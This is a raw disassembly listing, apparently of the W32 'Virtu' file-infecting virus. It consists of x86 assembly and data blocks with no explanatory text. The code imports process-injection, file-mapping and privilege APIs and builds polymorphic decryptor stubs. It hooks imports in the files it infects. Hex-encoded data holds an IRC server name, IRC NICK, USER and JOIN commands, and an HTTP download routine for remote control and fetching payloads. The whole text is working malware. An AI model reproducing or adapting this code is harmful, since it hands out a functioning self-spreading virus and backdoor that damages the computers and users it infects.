lea esi, sub_401000[ebp]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, loc_40144C[ebp]
jmp eax
; END OF FUNCTION CHUNK FOR sub_409B29
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h, 0E0h, 18h
db 40h ; @
align 2
dw 0FF52h
db 95h ;
dd offset loc_40359C
db 0E8h, 16h, 0
db 0
align 2
aLookupprivileg db 'LookupPrivilegeValueA',0
dd 4895FF50h, 89004035h, 40354C85h, 6A545000h, 0FFFF6A20h
dd 4035EC95h, 5FC08500h, 6A963F75h, 8B565602h, 52016AD4h
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0FF560065h
dd 40354C95h, 56C48B00h, 56505656h, 0D095FF57h, 83004035h
dd 0FF5710C4h, 40353C95h, 6A006A00h, 7095FF02h, 0B9004035h
dd 128h, 89E12B97h, 5754240Ch, 35AC95FFh, 0F6330040h, 363CA583h
dd 54000040h, 0B095FF57h, 85004035h, 465C74C0h, 7204FE83h
dd 2474FFEEh, 6A006A08h, 0A895FF2Ah, 85004035h, 93DC74C0h
dd 43DE8h, 91C93300h, 853930E3h, 40363Ch, 0C1812875h, 0DAEh
dd 56505450h, 53505051h, 356895FFh, 0C0850040h, 0FF0F7459h
dd 8F082474h, 40363C85h, 0FDACE800h, 0FF53FFFFh, 40353C95h
dd 8198EB00h, 128C4h, 95FF5700h, 40353Ch, 0FFFBE5E9h, 498DFFh
dd 585858h, 29CEh, 0D65h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_409F8C proc near ; CODE XREF: sub_409B29+100�p
; sub_409B29+218�p ...
push ecx
push esi
push ebx
call dword ptr ss:loc_403548[ebp]
stosd
pop ecx
loc_409F97: ; CODE XREF: sub_409F8C+E�j
lodsb
test al, al
jnz short loc_409F97
loop sub_409F8C
retn
sub_409F8C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread_0 db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehan_0 db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya_0 db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_40A327 proc near ; CODE XREF: .rsrc:0040A3CE�p
; .rsrc:0040A3DF�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_40A327 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_40A40A
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr ss:loc_4035E4[ebp]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_40A40A
mov ecx, dword ptr ss:loc_401588[ebp]
jecxz short loc_40A3C2
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_40A3C2: ; CODE XREF: .rsrc:0040A3B4�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_40A327
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_40A327
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_40A327
mov eax, dword ptr ss:loc_4035DC[ebp]
test eax, eax
jz short loc_40A40A
lea ecx, [edi+23F5h]
call sub_40A327
loc_40A40A: ; CODE XREF: .rsrc:0040A374�j
; .rsrc:0040A3AC�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, loc_401DAE[ebp]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1A43ED81h, 0FF6A0040h, 1A0E958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 401A54h, 85C720CDh
dd 401A56h, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1A72B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 35F095FFh, 0C4830040h, 74958B0Ch, 2B004035h, 7EA83D7h
dd 6A07C7h, 578900E8h, 1A6AC303h, 9E858h, 428D0000h, 0C9FEAA61h
db 75h, 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_40A4EF proc near ; CODE XREF: sub_40AD5A+1B�p
; sub_40AED2+3�p ...
imul edx, dword ptr ss:loc_403646[ebp], 8088405h
inc edx
mov dword ptr ss:loc_403646[ebp], edx
mul edx
retn
sub_40A4EF endp
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401B09h, 364A9D8Bh, 7C830040h, 0F000824h
dd 0B984h, 8EC8100h, 54000002h, 10468h, 9095FF00h, 8B004035h
dd 24848DFCh, 104h, 0E8006A50h, 4, 545256h, 8C95FF57h
dd 33004035h, 4978DC9h, 51000001h, 51026A51h, 68016Ah
dd 52400000h, 355C95FFh, 85960040h, 505B74F6h, 1046854h
dd 0FF570000h, 22024B4h, 95FF0000h, 403628h, 74C08559h
dd 5014E316h, 6AD48Bh, 56575152h, 35CC95FFh, 85590040h
dd 56D075C0h, 353C95FFh, 578D0040h, 6A575244h, 978D5844h
dd 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h, 356495FFh
dd 0C4810040h, 208h, 82474FFh, 361895FFh, 0FF530040h, 40361895h
dd 4C25D00h, 0A3E8000h, 8B460175h, 4015848Dh, 8D19E300h
dd 40100095h, 56D10300h, 0C084D2FFh, 11F880Fh, 840F0000h
dd 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h, 0F175203Eh
dd 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h, 6A51CEh
dd 0FF535651h, 40361095h, 0C13B5900h, 0DF850Fh, 858D0000h
dd 401DA2h, 0C68006Ah, 50000000h, 1095FF53h, 3D004036h
dd 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh, 0A5850F56h
dd 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h, 0ACF37520h
dd 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h, 203CAC7Fh
dd 7E817C75h, 746820FFh, 81717574h, 3A70037Eh, 68752F2Fh
dd 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h, 4035BCh
dd 5050C033h, 9E85050h, 44000000h, 6C6E776Fh, 64616Fh
dd 362095FFh, 0C0850040h, 0C9333674h, 364A8589h, 68510040h
dd 80000200h, 50565151h, 362495FFh, 958D0040h, 401B03h
dd 54C93350h, 51525051h, 6C95FF51h, 87004035h, 95FF2404h
dd 40353Ch, 8D80C3F8h, 401577h, 53C3F901h, 5754464Fh, 5C455241h
dd 7263694Dh, 666F736Fh, 69575C74h, 776F646Eh, 75435C73h
dd 6E657272h, 72655674h, 6E6F6973h, 7078455Ch, 65726F6Ch
dd 61540072h, 74656772h, 74736F48h, 0FF000200h, 0F0h, 6F727000h
dd 2E6D6978h, 67637269h, 78616C61h, 6C702E79h, 43494E00h
dd 7279204Bh, 67686669h, 550A6F72h, 20524553h, 30323074h
dd 20313035h, 202E202Eh, 4F4A2D3Ah, 26204E49h, 74726976h
dd 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401DB4h
mov byte ptr ss:loc_401577[ebp], 0
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz short loc_40A809
push 1Eh
mov esi, [ebp+403550h]
pop ecx
loc_40A7D6: ; CODE XREF: .rsrc:loc_40A805�j
lodsb
cmp al, 2Eh
jnz short loc_40A805
cmp word ptr [esi], 1DFFh
jnz short loc_40A805
lea edi, loc_403640[ebp]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+40336Ah]
pop dword ptr [ebp+403390h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_40A805: ; CODE XREF: .rsrc:0040A7D9�j
; .rsrc:0040A7E0�j
loop loc_40A7D6
jmp short loc_40A84C
; ---------------------------------------------------------------------------
loc_40A809: ; CODE XREF: .rsrc:0040A7CB�j
lea eax, [ebp+4015B1h]
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
cmp dword ptr [esp+8], 4
jnz short loc_40A84C
call near ptr loc_40A829+1
push ebx
inc esi
inc ebx
loc_40A829: ; CODE XREF: .rsrc:0040A821�p
add bh, bh
xchg eax, ebp
mov ds:48E80040h, dh
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 8895FF00h, 0E8004035h
dd 0FFFFFC31h
; ---------------------------------------------------------------------------
loc_40A84C: ; CODE XREF: .rsrc:0040A807�j
; .rsrc:0040A81F�j
call sub_409BA7
dec dword ptr [ebp+401303h]
call near ptr loc_40A866+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40A866: ; CODE XREF: .rsrc:0040A857�p
add bh, bh
xchg eax, ebp
pushf
xor eax, 0AE80040h
; ---------------------------------------------------------------------------
db 0
dd 73770000h, 6E697270h, 416674h, 4895FF50h, 89004035h
dd 40355485h, 8D310F00h, 4018E08Dh, 46858900h, 51004036h
db 0FFh, 95h
off_40A89A dd offset loc_40359C ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dw 6893h
dd 4, 18EDB58Dh, 8D590040h, 40362CBDh, 0F6D6E800h, 0C766FFFFh
dd 401D6785h, 83F0FF00h, 401D69A5h, 958D0000h, 401D27h
dd 16A5450h, 6852006Ah, 80000002h, 363095FFh, 0C0850040h
dd 8D22755Ah, 401D5A8Dh, 66A5200h, 1D67B58Dh, 56540040h
dd 52515050h, 363495FFh, 0FF580040h, 40362C95h, 4D85C600h
dd 4038h, 0CE8h, 4F535700h, 32334B43h, 4C4C442Eh, 9C95FF00h
dd 93004035h, 768h, 44B58D00h, 59004018h, 35FCBD8Dh, 51E80040h
dd 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh, 4C4C44h, 359C95FFh
dd 0C0850040h, 1E7840Fh, 68930000h, 5, 1882B58Dh, 8D590040h
dd 403618BDh, 0F61AE800h, 0BD83FFFFh, 40361Ch, 0C2840F00h
dd 81000001h, 190ECh, 1685400h, 0FF000001h, 4035FC95h
dd 90C48100h, 50000001h, 6AD48Bh, 1C95FF52h, 85004036h
dd 0D7559C0h, 138868h, 0BC95FF00h, 0EB004035h, 69BD83E2h
dd 401Dh, 858D2975h, 401D6Dh, 895FF50h, 85004036h, 3B840FC0h
dd 8B000001h, 8B0C40h, 858F30FFh, 401D69h, 384D85C6h, 6A010040h
dd 6A016A00h, 1495FF02h, 83004036h, 840FFFF8h, 112h, 65958D93h
dd 6A00401Dh, 0FF535210h, 40360495h, 0FC08500h, 0F285h
dd 86BD8D00h, 0B100401Dh, 0FABCE808h, 9468FFFFh, 5E000000h
dd 3489E62Bh, 95FF5424h, 403598h, 1D94BD8Dh, 1B10040h
dd 0FFFA9DE8h, 24448BFFh, 8E0C110h, 424440Bh, 0B08E0C1h
dd 50082444h, 5E8h, 362E2500h, 0FF570078h, 40355495h, 0CC48300h
dd 200647C6h, 1D81958Dh, 6A0040h, 2168h, 0FF535200h, 40361095h
dd 247C8D00h, 95FF5714h, 403558h, 0A3804C6h, 50006A40h
dd 95FF5357h, 403610h, 0BD8DE603h, 401DA2h, 0C68006Ah
dd 57000000h, 1095FF53h, 3D004036h, 0Ch, 0B58D4D75h, 40364Eh
dd 384D8D8Dh, 0CE2B0040h, 5651006Ah, 0C95FF53h, 83004036h
dd 2F7E00F8h, 8DFE8B91h, 40364EB5h, 0F20DB000h, 601075AEh
dd 0FFFAF8E8h, 177261FFh, 778D09E3h, 8BEAEB01h, 8DCE2BCFh
dd 40364EBDh, 87A4F300h, 53B9EBF7h, 360095FFh, 0BD800040h
dd 401577h, 682A7401h, 7530h, 35BC95FFh, 0BD800040h, 40384Dh
dd 0C7117400h, 401D6985h, 0
dd 4D85C600h, 4038h, 0FFFE56E9h, 8085C7FFh, 4015h, 5D800000h
dd 0D0004C2h, 6E204F0Ah, 206E6F6Fh, 6C20666Fh, 21656669h
dd 74204F20h, 20656D69h, 63206F74h, 62656C65h, 65746172h
dd 200A0D21h, 20202020h, 7573204Fh, 72656D6Dh, 72616720h
dd 216E6564h, 65520A0Dh, 746E656Ch, 7373656Ch, 6820796Ch
dd 79707061h, 646E6120h, 70786520h, 61746365h, 202C746Eh
dd 6E617473h, 676E6964h, 0D2D203Ah, 7461570Ah, 6E696863h
dd 6C612067h, 6164206Ch, 6E612079h, 696E2064h, 2C746867h
dd 726F6620h, 69726620h, 73646E65h, 77204920h, 3A746961h
dd 68570A0Dh, 20657265h, 20657261h, 2C756F79h, 69726620h
dd 73646E65h, 6F43203Fh, 2021656Dh, 69207449h, 69742073h
dd 2021656Dh, 73277449h, 74616C20h, 0A0D2165h, 30C78404h
dd 10A61429h, 3AAB5957h, 7F86AE83h, 4FD479EDh, 1A73C17Eh
dd 40375248h, 606EF96Ah, 10A61413h, 6299AD47h, 27B1FAE5h
dd 0D8B8B352h, 0C26CCC5Ch, 13h dup(0)
; =============== S U B R O U T I N E =======================================
sub_40ACA4 proc near ; CODE XREF: sub_40ACEB:loc_40AD48�p
; sub_40ADAB+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr ss:loc_4039A6[ebp], 0
and dword ptr ss:loc_4039AA[ebp], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_40ACC0: ; CODE XREF: sub_40ACA4+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_40ACE2
cmp eax, [edx+8]
jnb short loc_40ACE2
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov dword ptr ss:loc_4039A6[ebp], edx
mov dword ptr ss:loc_4039AA[ebp], eax
jmp short loc_40ACE7
; ---------------------------------------------------------------------------
loc_40ACE2: ; CODE XREF: sub_40ACA4+23�j
; sub_40ACA4+28�j
add edx, 28h
loop loc_40ACC0
loc_40ACE7: ; CODE XREF: sub_40ACA4+3C�j
popa
retn 4
sub_40ACA4 endp
; =============== S U B R O U T I N E =======================================
sub_40ACEB proc near ; CODE XREF: .rsrc:0040B017�p
; .rsrc:0040B03D�p
mov byte ptr ss:dword_4022F7[ebp], al
call sub_40AD5A
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_40AD02: ; CODE XREF: sub_40ACEB+1E�j
cmp [eax], ebx
jz short loc_40AD12
add eax, 4
loop loc_40AD02
inc dword ptr ss:loc_40398E[ebp]
retn
; ---------------------------------------------------------------------------
loc_40AD12: ; CODE XREF: sub_40ACEB+19�j
neg ecx
add ecx, ss:dword_4022F7[ebp]
jecxz short loc_40AD2C
loc_40AD1C: ; CODE XREF: sub_40ACEB+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_40AD1C
mov [ebp+402224h], ebx
loc_40AD2C: ; CODE XREF: sub_40ACEB+2F�j
; sub_40AD5A+34�j
cmp dword ptr [edx], 0
jz short loc_40AD36
sub esi, [edx]
add esi, [edx+10h]
loc_40AD36: ; CODE XREF: sub_40ACEB+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_40AD45
push dword ptr [edx]
jmp short loc_40AD48
; ---------------------------------------------------------------------------
loc_40AD45: ; CODE XREF: sub_40ACEB+54�j
push dword ptr [edx+10h]
loc_40AD48: ; CODE XREF: sub_40ACEB+58�j
call sub_40ACA4
sub ecx, esi
sub ecx, dword ptr ss:loc_4039AA[ebp]
pop eax
add ecx, [ebx+34h]
retn
sub_40ACEB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40AD5A proc near ; CODE XREF: sub_40ACEB+6�p
pop dword ptr [ebp+403992h]
mov dword ptr ss:loc_40398E[ebp], 0
call sub_40ADAB
mov eax, dword ptr ss:loc_40398E[ebp]
call sub_40A4EF
call sub_40AD97
cmp dword ptr ss:loc_40398E[ebp], 0
jnz short loc_40AD90
mov dword ptr ss:loc_4022A0[ebp], ebx
jmp short loc_40AD2C
; ---------------------------------------------------------------------------
loc_40AD90: ; CODE XREF: sub_40AD5A+2C�j
dec dword ptr ss:loc_40398E[ebp]
retn
sub_40AD5A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40AD97 proc near ; CODE XREF: sub_40AD5A+20�p
pop dword ptr [ebp+403992h]
mov dword ptr ss:loc_40398E[ebp], edx
call sub_40ADAB
xor ecx, ecx
retn
sub_40AD97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40ADAB proc near ; CODE XREF: sub_40AD5A+10�p
; sub_40AD97+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_40ACA4
add edx, dword ptr ss:loc_4039AA[ebp]
add edx, esi
loc_40ADBF: ; CODE XREF: sub_40ADAB+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_40AED0
cmp dword ptr [edx+10h], 0
jz locret_40AED0
mov eax, [edx+0Ch]
push eax
call sub_40ACA4
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, esi
push eax
loc_40ADE5: ; CODE XREF: sub_40ADAB+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_40AE05
cmp cl, 2Eh
jz short loc_40ADF4
loc_40ADF1: ; CODE XREF: sub_40ADAB+58�j
inc eax
jmp short loc_40ADE5
; ---------------------------------------------------------------------------
loc_40ADF4: ; CODE XREF: sub_40ADAB+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_40ADF1
loc_40AE05: ; CODE XREF: sub_40ADAB+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_40AEC8
cmp word ptr [eax-2], 3233h
jnz loc_40AEC8
push esi
cmp dword ptr [edx], 0
jnz short loc_40AE28
mov ecx, [edx+10h]
jmp short loc_40AE2A
; ---------------------------------------------------------------------------
loc_40AE28: ; CODE XREF: sub_40ADAB+76�j
mov ecx, [edx]
loc_40AE2A: ; CODE XREF: sub_40ADAB+7B�j
add esi, ecx
push ecx
call sub_40ACA4
add esi, dword ptr ss:loc_4039AA[ebp]
loc_40AE38: ; CODE XREF: sub_40ADAB+90�j
; sub_40ADAB+117�j
lodsd
test eax, eax
js short loc_40AE38
jz loc_40AEC7
push dword ptr ss:loc_4039AA[ebp]
push eax
call sub_40ACA4
add eax, dword ptr ss:loc_4039AA[ebp]
pop dword ptr ss:loc_4039AA[ebp]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_40AE64: ; CODE XREF: sub_40ADAB+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_40AE7B
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_40AE64
; ---------------------------------------------------------------------------
loc_40AE7B: ; CODE XREF: sub_40ADAB+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_40AEC1
cmp ebx, 0DB6E45A8h
jz short loc_40AEC1
cmp ebx, 0FFA13B59h
jz short loc_40AEC1
cmp ebx, 0ACB522D6h
jz short loc_40AEC1
cmp ebx, 0F358E993h
jz short loc_40AEC1
cmp ebx, 0F358E97Dh
jz short loc_40AEC1
cmp ebx, 0E1253F46h
jz short loc_40AEC1
cmp ebx, 0E1253F30h
jz short loc_40AEC1
call dword ptr [ebp+403992h]
loc_40AEC1: ; CODE XREF: sub_40ADAB+D6�j
; sub_40ADAB+DE�j ...
pop ebx
jmp loc_40AE38
; ---------------------------------------------------------------------------
loc_40AEC7: ; CODE XREF: sub_40ADAB+92�j
pop esi
loc_40AEC8: ; CODE XREF: sub_40ADAB+60�j
; sub_40ADAB+6C�j
add edx, 14h
jmp loc_40ADBF
; ---------------------------------------------------------------------------
locret_40AED0: ; CODE XREF: sub_40ADAB+18�j
; sub_40ADAB+22�j
retn
sub_40ADAB endp
; ---------------------------------------------------------------------------
db 3
; =============== S U B R O U T I N E =======================================
sub_40AED2 proc near ; CODE XREF: .rsrc:0040B010�p
; .rsrc:0040B036�p
push 4
pop eax
call sub_40A4EF
mov ss:byte_4024D1[ebp], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_40A4EF
add edx, 8
xchg edx, ecx
loc_40AEFA: ; CODE XREF: sub_40AED2:loc_40AF39�j
push 5
pop eax
call sub_40A4EF
cmp dl, 3
jnb short loc_40AF12
mov al, 50h
add al, ss:byte_4024D1[ebp]
stosb
jmp short loc_40AF39
; ---------------------------------------------------------------------------
loc_40AF12: ; CODE XREF: sub_40AED2+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_40AF33
mov al, 11h
call sub_40A4EF
mov eax, 1
loc_40AF27: ; CODE XREF: sub_40AED2+5D�j
test dl, dl
jz short loc_40AF38
shl eax, 1
dec dl
jmp short loc_40AF27
; ---------------------------------------------------------------------------
jmp short loc_40AF38
; ---------------------------------------------------------------------------
loc_40AF33: ; CODE XREF: sub_40AED2+47�j
mov eax, 80000000h
loc_40AF38: ; CODE XREF: sub_40AED2+57�j
; sub_40AED2+5F�j
stosd
loc_40AF39: ; CODE XREF: sub_40AED2+3E�j
loop loc_40AEFA
retn
sub_40AED2 endp
; ---------------------------------------------------------------------------
loc_40AF3C: ; CODE XREF: sub_40B996+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_40AF51
mov al, 60h
stosb
loc_40AF51: ; CODE XREF: .rsrc:0040AF4C�j
test dword ptr [ebp+403431h], 1000003h
jz loc_40B057
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCA5B15h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov dword ptr ss:loc_40399A[ebp], edi
jz short loc_40AFCF
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_40AF9A
mov eax, 2E8B6467h
loc_40AF9A: ; CODE XREF: .rsrc:0040AF93�j
stosd
mov ax, 0
stosw
jz short loc_40AFA6
mov al, 5Dh
stosb
loc_40AFA6: ; CODE XREF: .rsrc:0040AFA1�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_40AFCD
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_40AFCD
mov eax, 0F8ED83h
loc_40AFCD: ; CODE XREF: .rsrc:0040AFB5�j
; .rsrc:0040AFC6�j
stosd
dec edi
loc_40AFCF: ; CODE XREF: .rsrc:0040AF82�j
test dword ptr [ebp+403431h], 3
jz short loc_40AFDF
mov al, 0E9h
stosb
stosd
loc_40AFDF: ; CODE XREF: .rsrc:0040AFD9�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_40B057
mov eax, 36FF6467h
mov dword ptr ss:loc_40399E[ebp], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_40AED2
mov al, 20h
call sub_40ACEB
jecxz short loc_40B057
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_40B04A
call sub_40AED2
mov al, 1Fh
call sub_40ACEB
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_40B04A: ; CODE XREF: .rsrc:0040B034�j
mov ecx, edi
mov eax, dword ptr ss:loc_40399E[ebp]
sub ecx, eax
mov [eax-4], ecx
loc_40B057: ; CODE XREF: .rsrc:0040AF5B�j
; .rsrc:0040AFF6�j ...
test dword ptr [ebp+403431h], 4
jz short loc_40B075
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_40B075: ; CODE XREF: .rsrc:0040B061�j
test dword ptr [ebp+403431h], 8
jnz short loc_40B0CB
cmp byte ptr [ebp+40342Fh], 0
jz short loc_40B0CB
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_40B0C9
mov al, 49h
stosb
mov ax, 0FC75h
loc_40B0C9: ; CODE XREF: .rsrc:0040B0C0�j
stosw
loc_40B0CB: ; CODE XREF: .rsrc:0040B07F�j
; .rsrc:0040B088�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_40B0EC
mov al, 58h
or al, byte ptr ss:loc_403429[ebp]
stosb
loc_40B0EC: ; CODE XREF: .rsrc:0040B0E1�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_40B0FF
add ah, 28h
loc_40B0FF: ; CODE XREF: .rsrc:0040B0FA�j
or ah, byte ptr ss:loc_403429[ebp]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_40B123
mov al, 50h
add al, byte ptr ss:loc_403429[ebp]
stosb
loc_40B123: ; CODE XREF: .rsrc:0040B118�j
test dword ptr [ebp+403431h], 80h
jnz short loc_40B13A
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_40B177
; ---------------------------------------------------------------------------
loc_40B13A: ; CODE XREF: .rsrc:0040B12D�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_40B14C
mov al, 29h
loc_40B14C: ; CODE XREF: .rsrc:0040B148�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_40B16F
mov ah, 0C8h
loc_40B16F: ; CODE XREF: .rsrc:0040B16B�j
or ah, [ebp+40342Ah]
stosw
loc_40B177: ; CODE XREF: .rsrc:0040B138�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_40B1FB
test dword ptr [ebp+403431h], 400h
jnz short loc_40B1A6
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_40B1F3
; ---------------------------------------------------------------------------
loc_40B1A6: ; CODE XREF: .rsrc:0040B199�j
test dword ptr [ebp+403431h], 800h
jnz short loc_40B1C3
